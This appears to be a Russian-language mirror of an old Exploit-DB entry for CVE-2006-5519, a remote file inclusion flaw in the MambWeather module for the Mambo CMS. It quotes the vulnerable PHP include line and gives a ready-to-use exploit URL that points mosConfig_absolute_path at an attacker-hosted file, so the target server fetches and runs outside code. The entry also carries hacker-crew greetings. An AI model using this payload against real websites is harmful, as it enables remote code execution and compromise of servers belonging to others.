- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2613
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- H4NTU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5519
- Дата публикации
- 2006-10-22
		Код:
	
	Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility
download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
 
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
 
 <?php
 /**
 * Base plugin class.
 */
 global $mosConfig_absolute_path;
 require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';
 /**
exploit:
http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet
# milw0rm.com [2006-10-22]- Источник
- www.exploit-db.com
 
 
		